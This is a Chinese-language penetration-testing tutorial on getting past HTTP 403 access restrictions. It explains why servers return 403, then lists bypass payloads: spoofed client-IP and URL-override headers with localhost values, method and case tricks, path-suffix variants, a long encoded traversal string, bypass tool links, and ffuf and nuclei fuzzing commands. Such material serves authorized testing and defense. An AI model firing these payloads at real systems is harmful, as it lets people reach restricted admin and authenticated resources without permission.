Bypass 403 绕过技术详解

403 错误基础概念

403 页面是 Web 服务器返回的 HTTP 状态码之一，表示服务器已经理解客户端(通常是浏览器)的请求，但出于某种原因拒绝了该请求。当客户端尝试访问受限资源或执行未经授权的操作时，服务器会返回403错误状态码。

403 错误的常见原因

1. 缺少访问权限：客户端尝试访问需要特定身份验证或权限的资源，但提供的凭据不足
2. IP地址被拒绝：服务器配置了IP地址过滤规则，拒绝了特定IP地址或IP地址范围的访问
3. 文件或目录权限设置：服务器没有授予客户端访问该文件或目录的权限
4. 目录浏览禁止：服务器配置禁止目录浏览功能
5. 防火墙或安全设备拦截：网络中的防火墙、WAF或其他安全设备检测到可疑请求
6. 访问限制策略：服务器限制了特定类型的请求或HTTP方法
7. 防止目录遍历：服务器配置了防止目录遍历功能
8. 请求频率限制：服务器实施了请求频率限制策略
9. 未登录或会话过期：对于需要登录的资源，客户端未登录或会话过期
10. URL重写或重定向问题：URL重写或重定向配置不当导致资源被阻止访问
11. CSRF保护：缺少有效的CSRF令牌
12. 请求头不正确：缺少特定的头部信息
13. 网站维护模式：网站处于维护模式
14. 恶意行为或黑名单：客户端IP地址被列入黑名单
15. CDN配置问题：CDN服务器拦截请求
16. URL参数错误：URL参数不符合要求
17. 安全插件或模块配置：安全插件或模块拦截请求
18. 用户被禁用：用户账户处于限制或封禁状态

403 绕过技术

1. Host头绕过

通过修改Host头部，可能绕过服务器对特定Host的限制或防御措施：

• 把host值修改为子域名
• 使用IP地址来绕过

实战示例：

GET /admin HTTP/1.1
Host: localhost

2. Header头绕过

使用各种HTTP头部进行绕过尝试：

Access-Control-Allow-Origin: 
Base-Url: 
CF-Connecting_IP: 
CF-Connecting-IP: 
Client-IP: 
Cluster-Client-IP: 
Destination: 
Forwarded-For-Ip: 
Forwarded-For: 
Forwarded-Host: 
Forwarded: 
Host: 
Http-Url: 
Origin: 
Profile: 
Proxy-Host: 
Proxy-Url: 
Proxy: 
Real-Ip: 
Redirect: 
Referer: 
Referrer: 
Request-Uri: 
True-Client-IP: 
Uri: 
Url: 
X-Arbitrary: 
X-Client-IP: 
X-Custom-IP-Authorization: 
X-Forward-For: 
X-Forward: 
X-Forwarded-By: 
X-Forwarded-For-Original: 
X-Forwarded-For: 
X-Forwarded-Host: 
X-Forwarded-Proto: 
X-Forwarded-Server: 
X-Forwarded: 
X-Forwarder-For: 
X-Host: 
X-HTTP-DestinationURL: 
X-HTTP-Host-Override: 
X-Original-Remote-Addr: 
X-Original-URL: 
X-Originally-Forwarded-For: 
X-Originating-IP: 
X-Proxy-Url: 
X-ProxyUser-Ip: 
X-Real-Ip: 
X-Real-IP: 
X-Referrer: 
X-Remote-Addr: 
X-Remote-IP: 
X-Rewrite-URL: 
X-True-IP: 
X-WAP-Profile:

IP地址格式尝试：

0.0.0.0
127.0.0.1
localhost
::1
::ffff:127.0.0.1

3. Protocol 绕过

协议版本更改：

• 从HTTP 1.2降级到HTTP 1.1
• 使用HTTP 1.0版本

4. Unicode字符绕过

尝试插入unicode字符以绕过防御：

• /cadmin被阻止时，尝试访问%cadmin

5. Referer标头绕过

网站限制了访问来源时，可以尝试修改Referer头：

GET /auth/login HTTP/1.1
Host: example.com
Referer: https://example.com/auth/login

6. Port 绕过

修改X-Forwarded-Port头部欺骗服务器：

X-Forwarded-Port: 443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080

7. 大小写绕过

example.com/admin -> 403 Forbidden
example.com/aDmin -> 200 OK

8. HTTP方法绕过

尝试不同的HTTP方法：

GET HEAD POST PUT DELETE TRACE OPTIONS PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK VERSION-CONTROL REPORT CHECKOUT CHECKIN UNCHECKOUT MKWORKSPACE UPDATE LABEL MERGE BASELINE-CONTROL MKACTIVITY ORDERPATCH PATCH SEARCH BCOPY BDELETE BMOVE BPROPFIND BPROPPATCH NOTIFY POLL SUBSCRIBE UNSUBSCRIBE X-MS-ENUMATTS

9. Endpaths 绕过

在路径末尾添加特殊字符：

site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin...;/ => 200
site.com/admin/...;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

10. Midpaths 绕过

通过目录穿越绕过：

?%%09%09%3b%09..%09;%20%20%23%23%3f%252f%252f%252f%26%2e%2e%2e%2e%2e%2f%2e%2e%2e%2f%2f%20%23%2f%23%2f%2f%2f%3b%2f%2f%3b%2f%2f%2f%3f%2f%3f%2f%3b%3b%09%3b%2f%2e%2e%3b%2f%2e%2e%2f%2e%2e%2f%2f%3b%2f%2e.%3b%2f..%3b/%2e%2e/..%2f%2f%3b/%2e.%3b/%2f%2f..%3b/..%3b//%2f..%3f%3f%23%3f%3f&.%2e....%00..%00/;..%00;..%09..%0d..%0d/;..%0d;..%2f..%3B..%5c..%5c..%ff..%ff/;..%ff;00..;%0d..;%ff.html.json%20#%20%20%20%23%252e%252e%252f%252e%252e%253b%252e%252f%252e%253b%252e%252f%2e%2e%2e%2e%3b%2e%2e%2e%2f%2e%3b%2e%3b/%2e%2e/%2f%3b**.....%2f..%2f..%2f..%2f..%2f..%2f.2f..;%2f..;%2f..;%2f..;%2f..;%2f.randomstring/anything;;/;x;xx/..x/../x/../;x/..;x/..;/x/..;/;x//..x//..;x/;/..x/09;%09..;%09..;;%09;;%2f%2e%2e;%2f%2e%2e%2f%2e%2e%2f%2f;%2f%2f/..;%2f..;%2f..%2f%2e%2e%2f%2f;%2f..%2f..%2f%2f;%2f..%2f;%2f..%2f/..%2f;%2f..%2f/..;%2f../%2f..%2f;%2f../%2f..;%2f..//..%2f;%2f..//..;%2f..//;%2f..///;;%2f..//;;%2f.2f../;/;%2f../;/;;%2f.2f..;//;%2f..;//;;%2f..;/;/;%2f/%2f..;%2f//..%2f;%2f//..;%2f//..;;%2f/;/..;%2f/;/..;;%2f;//..;%2f;2e%2e;/%2e%2e%2f%2f;/%2e%2e%2f;/%2e%2e;/%2e.;/%2f%2f..;/%2f/..%2f;/%2f/..;/.%2e;/.%2e/%2e%2e/%2f;2f;/..%2f%2f..;/..%2f..%2f;/..%2f;/..%2f/2f;2e%2e;/..//%2f;2f.foo=bar;x;x;x;

11. UserAgents 绕过

修改User-Agent字段，设置为目标服务器预期的合法用户代理或客户端类型。可以使用大量不同的User-Agent字符串进行尝试。

自动化工具

1. 403绕过工具

• https://github.com/Dheerajmadhukar/4-ZERO-3
• https://github.com/iamj0ker/bypass-403
• https://github.com/yunemse48/403bypasser
• https://github.com/sting8k/BurpSuite_403Bypasser
• https://github.com/lobuhi/byp4xx

2. FFUF 模糊测试

路径模糊测试：

ffuf -w 403_url_payloads.txt -u http://example.com/auth_pathFUZZ -fc 403,401,400

HTTP标头模糊测试：

ffuf -w 403_bypass_header_names.txt:HEADER -w 403_bypass_header_values.txt:VALUE -u http://example.com/auth_path -H "HEADER:VALUE" -fc 403,401,400

端口模糊测试：

ffuf -w common-http-ports.txt:PORT -u http://example.com/auth_path -H "Host:example.com:PORT" -fc 403,401,400

HTTP方法模糊测试：

ffuf -w http-methods.txt:METHOD -u http://example.com/auth_path -X "METHOD" -fc 403,401,400

User-Agent模糊测试：

ffuf -w user-agents.txt:AGENT -u http://example.com/auth_path -H "User-Agent: AGENT" -fc 403,401,400

3. Nuclei 模板

使用Nuclei的403绕过模板进行测试：

nuclei -u http://example.com/auth_path/ -t 403-bypass-nuclei-templates -tags fuzz -timeout 10 -c 200 -v

总结

403绕过技术多样，需要根据具体情况尝试不同的方法。关键点包括：

1. 修改HTTP头部信息
2. 尝试不同的HTTP方法和协议版本
3. 使用特殊字符和编码绕过
4. 利用路径遍历技术
5. 修改User-Agent
6. 使用自动化工具进行批量测试

在实际渗透测试中，应结合多种技术进行综合测试，以最大化绕过403限制的可能性。